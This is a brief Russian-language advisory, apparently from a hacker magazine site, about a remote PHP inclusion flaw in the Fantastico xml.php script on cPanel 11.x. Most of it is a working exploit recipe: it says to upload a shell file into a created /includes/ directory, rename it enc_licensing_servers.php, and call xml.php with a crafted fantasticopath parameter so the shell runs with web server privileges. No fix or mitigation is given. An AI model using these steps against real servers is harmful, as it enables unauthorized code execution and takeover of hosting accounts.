Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Cpanel 11.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных сценарием xml.php. Удаленный пользователь может выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
Сначала создайте директорию /includes/ и загрузить Shell.php в /includes/.
Затем переименуйте его в enc_licensing_servers.php.
http://xxx.com:2082/frontend/x/fantastico/includes/xml.php?fantasticopath=/home/user